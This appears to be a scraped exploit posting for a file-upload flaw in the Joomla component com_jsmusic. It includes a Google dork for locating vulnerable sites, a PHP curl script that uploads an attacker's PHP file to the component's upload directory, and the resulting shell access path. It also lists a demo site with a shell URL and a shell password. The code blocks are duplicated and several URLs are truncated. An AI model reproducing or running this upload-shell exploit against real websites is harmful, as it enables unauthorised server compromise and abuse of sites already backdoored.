#
# Author => Zikou-16
#
# Facebook => http://fb.me/Zikou.se
#
# Google Dork => inurl:"com_jsmusic"
#
##################################################################################
Exploit : uploadshell.php
Quote
<?php
$uploadfile="dz.php";
$ch = curl_init("http://localhost/com...com_jsmusic/js/");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
$uploadfile="dz.php";
$ch = curl_init("http://localhost/com...com_jsmusic/js/");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://localhost/com...music/js/dz.php
Quote
<?php
phpinfo();
?>
phpinfo();
?>
##################################################################################
#
# Demo : http://www.bsbmusica...y/uploadify.php
#
# Shell: http://www.bsbmusica...smusic/js/x.php
# _____________________
# Shell password => dz0
# _____________________
##################################################################################